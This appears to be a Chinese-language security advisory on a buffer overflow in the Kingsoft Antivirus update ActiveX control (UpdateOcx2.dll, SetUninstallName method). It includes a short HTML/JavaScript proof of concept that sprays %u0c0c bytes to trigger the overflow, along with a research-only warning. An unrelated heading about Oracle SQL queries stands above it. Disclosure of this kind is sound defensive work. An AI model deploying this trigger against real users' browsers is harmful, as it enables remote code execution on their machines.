oracle常用經典SQL查詢貼)

Kingsoft Antivirus Online Update Module是一款反病毒線上升級模組。
Kingsoft Antivirus線上升級模組包含的ActiveX控制項不正確處理使用者提交的參數資料，遠程攻擊者可以利用漏洞以應用程式進程許可權執行任意指令。
問題存在於C:/WINDOWS/system32/KingSoft/KOS/UpdateOcx2.dll控制項對SetUninstallName()方法的處理中，構建超長字串作為SetUninstallName()方法參數資料，並誘使使用者訪問惡意WEB頁，可導致觸發緩衝區溢位，可能以應用程式進程許可權執行任意指令。

測試方法: [警 告] 以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用.風險自負! -----------------------------------------------------------------------------------  <object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target1'></object>  <object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target2'></object>  <script>  var str1 = "";  while (str1.length < 914)  { str1 += unescape("%u0c0c");  }  target1.SetUninstallName(str1);  </script>  -----------------------------------------------------------------------------------

建議: 目前沒有解決方案提供： http://en.kingsoft.com/